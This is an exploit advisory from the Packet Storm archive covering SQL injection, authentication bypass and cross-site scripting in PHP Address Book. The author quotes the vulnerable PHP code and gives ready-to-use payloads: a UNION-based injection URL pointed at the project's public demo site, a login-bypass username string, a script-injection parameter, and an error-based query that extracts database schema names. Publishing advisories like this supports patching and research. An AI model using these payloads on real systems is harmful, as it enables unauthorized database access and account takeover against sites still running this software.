exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Address Book Cross Site Scripting / SQL Injection

PHP Address Book Cross Site Scripting / SQL Injection
Posted Jan 3, 2015
Authored by Manish Tanwar

PHP Address Book suffers from cross site scripting and remote SQL injection vulnerabilities, the latter allowing for authentication bypass.

tags | exploit, remote, php, vulnerability, xss, sql injection
SHA-256 | 5fd0d5967e528f419f41cbe2953fcf73cd0a1606e22cab21ab174e8d90448048

PHP Address Book Cross Site Scripting / SQL Injection

Change Mirror Download
##################################################################################################
#Exploit Title : PHP Address Book SQL Injection and xss vulnerability
#Author : Manish Kishan Tanwar
#Home page Link : http://sourceforge.net/projects/php-addressbook/
#Date : 01/01/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


php address book is web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported. PHP / MySQL based.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
1. SQL injection
2. Authentication bypass
3. XSS

1.SQL injection vulnerability:-
==============================
after login(using normal user account) attacker can exploit this issue.
parameter id is not escaping before passing to SQL query on view.php
vulnerable code is
-------------------
if ($id) {

$sql = "SELECT * FROM $base_from_where AND $table.id='$id'";
$result = mysql_query($sql, $db);
$r = mysql_fetch_array($result);

$resultsnumber = mysql_numrows($result);
}
--------------------
POC
http://php-addressbook.sourceforge.net/demo/view.php?id=1337' union select 1,2,3,4,version(),6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

image link:-
http://oi62.tinypic.com/2lncw3a.jpg

2.Authntication Bypass:-
=======================
checklogin.php page is passing user supplied data in username field to sql query without escaping and it is causing authentication
bypassing using payload
username = ' or 1336%2B1=1337--%20
password = any
--------------------------------------------------------
$urlun = strip_tags(substr($_REQUEST['username'],0,32));

$urlpw = strip_tags(substr($_REQUEST['password'],0,32));
$cleanpw = md5($urlpw);

$sql="SELECT * FROM users WHERE username='$urlun' and password='$cleanpw'";
--------------------------------------------------------

3.XSS:-
======
http://php-addressbook.sourceforge.net/demo/
?group=customer</option></select><script>alert(String.fromCharCode(120,115,115,32,116,101,115,116));</script>

image link:-
http://oi59.tinypic.com/dhbyh4.jpg


////////////////
/// POC ////
///////////////

POC image=http://oi57.tinypic.com/inv3ol.jpg
payload for extracting database name
set value of category parameter to 1 and add error based SQL injection payload to url

http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close